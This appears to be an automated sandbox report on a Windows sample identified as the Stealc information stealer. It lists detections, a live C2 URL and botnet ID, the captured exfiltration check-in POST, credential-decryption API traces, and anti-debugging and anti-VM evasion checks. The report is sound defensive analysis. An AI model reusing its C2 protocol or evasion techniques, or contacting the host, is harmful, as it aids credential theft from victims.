Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1538205
MD5: ffe1a72c9e5e3aa49aaba14b27f0e4ad
SHA1: ec14b0a1a2d5ed374394f41667084bb1c48307c1
SHA256: 315bf34c13238a2fa2f083ecd2bd6f440674ba5b8b5db199c1b35c9724e0e4bb
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 5644 cmdline: "C:\Users\user\Desktop\file.exe" MD5: FFE1A72C9E5E3AA49AABA14B27F0E4AD)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relied on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Yara matches:
Source: dump.pcap | Rule: JoeSecurity_Stealc_1 | Description: Yara detected Stealc | Author: Joe Security
Source: 00000000.00000002.2075749076.000000000138E000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: 00000000.00000003.2031125996.0000000005010000.00000004.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: Process Memory Space: file.exe PID: 5644 | Rule: JoeSecurity_PowershellDownloadAndExecute | Description: Yara detected Powershell download and execute | Author: Joe Security
Source: Process Memory Space: file.exe PID: 5644 | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security
Source: 0.2.file.exe.680000.0.unpack | Rule: JoeSecurity_Stealc | Description: Yara detected Stealc | Author: Joe Security

No Sigma rule has matched

Suricata IDS alerts:
Timestamp: 2024-10-20T20:13:57.397393+0200 | SID: 2044243 | Severity: 1 | Classtype: Malware Command and Control Activity Detected | Source IP: 192.168.2.5 | Source Port: 49704 | Destination IP: 185.215.113.37 | Destination Port: 80 | Protocol: TCP

                AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: http://185.215.113.37/ws | URL Reputation: Label: malware
Source: 0.2.file.exe.680000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0068C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00687240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00689AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00689B60 CryptUnprotectData,LocalAlloc,LocalFree
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00698EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006938B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00694910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0068DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0068E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00694570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0068ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0068BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0068DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006816D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00693EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0068F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0068F68A FindFirstFileA

                Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.37 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----IIJEBFCFIJJJEBGDBAKE | Host: 185.215.113.37 | Content-Length: 211 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 34 34 35 30 34 37 36 44 44 43 31 33 33 33 32 37 34 33 38 36 35 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 2d 2d 0d 0a | Data Ascii: ------IIJEBFCFIJJJEBGDBAKE Content-Disposition: form-data; name="hwid" A4450476DDC13332743865 ------IIJEBFCFIJJJEBGDBAKE Content-Disposition: form-data; name="build" doma ------IIJEBFCFIJJJEBGDBAKE--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37 (reported 7 times)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00684880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: 185.215.113.37 | Connection: Keep-Alive | Cache-Control: no-cache
Source: unknown | HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----IIJEBFCFIJJJEBGDBAKE | Host: 185.215.113.37 | Content-Length: 211 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 34 34 35 30 34 37 36 44 44 43 31 33 33 33 32 37 34 33 38 36 35 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 45 42 46 43 46 49 4a 4a 4a 45 42 47 44 42 41 4b 45 2d 2d 0d 0a | Data Ascii: ------IIJEBFCFIJJJEBGDBAKE Content-Disposition: form-data; name="hwid" A4450476DDC13332743865 ------IIJEBFCFIJJJEBGDBAKE Content-Disposition: form-data; name="build" doma ------IIJEBFCFIJJJEBGDBAKE--
Source: file.exe, 00000000.00000002.2075749076.000000000138E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.2075749076.00000000013E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.2075749076.00000000013E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/-zx3
Source: file.exe, 00000000.00000002.2075749076.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2075749076.0000000001403000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2075749076.00000000013E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php;Cc3
Source: file.exe, 00000000.00000002.2075749076.00000000013E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpWCG3
Source: file.exe, 00000000.00000002.2075749076.00000000013E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/ws
Source: file.exe, 00000000.00000002.2075749076.00000000013D2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/z%
Source: file.exe, 00000000.00000002.2075749076.000000000138E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37o

                System Summary

Source: file.exe | Static PE information: section name: (empty)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (empty)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4B891
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A3B0FD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00960861
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A37A93
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A2D2FB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A403B9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A41B96
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A3959F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A48535
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009A5D3B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A43D59
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00ABBEA7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A49E88
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A3CEEC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A44FE3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A0BF1D
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 006845C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: atgdqvtb ZLIB complexity 0.9950946306205728
Source: file.exe, 00000000.00000003.2031125996.0000000005010000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00699600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00693720 CoCreateInstance,MultiByteToWideChar,lstrcpyn
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Y8SNO5KI.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1818624 > 1048576
Source: file.exe | Static PE information: Raw size of atgdqvtb is bigger than: 0x100000 < 0x195e00

                Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.680000.0.unpack :EW;.rsrc :W;.idata :W; :EW;atgdqvtb:EW;eqelhmzu:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;atgdqvtb:EW;eqelhmzu:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00699860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1cb7a2 should be: 0x1bd146
Source: file.exe | Static PE information: section name: (empty)
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: (empty)
Source: file.exe | Static PE information: section name: atgdqvtb
Source: file.exe | Static PE information: section name: eqelhmzu
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AA88BE push ebx; mov dword ptr [esp], ecx | 0_2_00AA88EA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AA88BE push 70EA0B0Eh; mov dword ptr [esp], edx | 0_2_00AA892D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AF68B5 push 0C5A8994h; mov dword ptr [esp], esp | 0_2_00AF68DD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008E58A3 push ecx; mov dword ptr [esp], 7FEC6239h | 0_2_008E4CF1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008E58A3 push 780179B1h; mov dword ptr [esp], ecx | 0_2_008E5138
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008E58A3 push ebx; mov dword ptr [esp], ecx | 0_2_008E58CC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008E58A3 push edx; mov dword ptr [esp], 5FF81730h | 0_2_008E6D93
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008E58A3 push 01D306FCh; mov dword ptr [esp], ebp | 0_2_008E79AF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4B891 push 3DB85AEDh; mov dword ptr [esp], esi | 0_2_00A4B8A3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4B891 push ecx; mov dword ptr [esp], 76BE915Ah | 0_2_00A4B941
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4B891 push 2D4C639Ch; mov dword ptr [esp], ebx | 0_2_00A4B980
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4B891 push ebp; mov dword ptr [esp], esi | 0_2_00A4B9BE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4B891 push 78EE40E7h; mov dword ptr [esp], eax | 0_2_00A4B9D5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4B891 push 23A0CEE6h; mov dword ptr [esp], ebx | 0_2_00A4B9FC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4B891 push edx; mov dword ptr [esp], 72FF0C50h | 0_2_00A4BA8B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4B891 push eax; mov dword ptr [esp], edx | 0_2_00A4BB70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4B891 push esi; mov dword ptr [esp], 47C9EC7Fh | 0_2_00A4BC03
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4B891 push ebx; mov dword ptr [esp], 3DF65B00h | 0_2_00A4BC0F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4B891 push esi; mov dword ptr [esp], ebp | 0_2_00A4BC96
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4B891 push ebx; mov dword ptr [esp], 2C5CCB4Bh | 0_2_00A4BCDD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4B891 push 0B85CA00h; mov dword ptr [esp], esi | 0_2_00A4BCEC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4B891 push 6DDDD0E3h; mov dword ptr [esp], esp | 0_2_00A4BD8B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4B891 push eax; mov dword ptr [esp], ecx | 0_2_00A4BE08
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4B891 push edx; mov dword ptr [esp], 13F505CFh | 0_2_00A4BEB8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4B891 push ebp; mov dword ptr [esp], ebx | 0_2_00A4BEDE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4B891 push edx; mov dword ptr [esp], ecx | 0_2_00A4BEF7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4B891 push edx; mov dword ptr [esp], 03CF8740h | 0_2_00A4BF62
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4B891 push ebp; mov dword ptr [esp], 30E47224h | 0_2_00A4BF7B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4B891 push ebp; mov dword ptr [esp], edx | 0_2_00A4BF88
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4B891 push ecx; mov dword ptr [esp], 7FFE956Bh | 0_2_00A4BFCF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00A4B891 push 5D59C3B7h; mov dword ptr [esp], ebx | 0_2_00A4C015
Source: file.exe | Static PE information: section name: atgdqvtb entropy: 7.954841029285802

                Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00699860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-13612
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A5073B second address: A5074F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0BF8E3D56Eh 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A5074F second address: A50780 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0BF9145126h 0x00000008 jmp 00007F0BF914512Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop edi 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F0BF914512Eh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A50780 second address: A50784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A50784 second address: A50788 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A50788 second address: A50798 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0BF8E3D56Ah 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A50D41 second address: A50D5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0BF9145136h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A51021 second address: A51036 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0BF8E3D56Fh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A51036 second address: A5103B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A5103B second address: A51063 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F0BF8E3D572h 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jc 00007F0BF8E3D566h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A51063 second address: A51067 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A51067 second address: A5109E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0BF8E3D566h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F0BF8E3D56Fh 0x00000011 push edi 0x00000012 jmp 00007F0BF8E3D579h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: A53D83 second address: A53DA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a jmp 00007F0BF9145136h 0x0000000f pop ebx 0x00000010 rdtsc
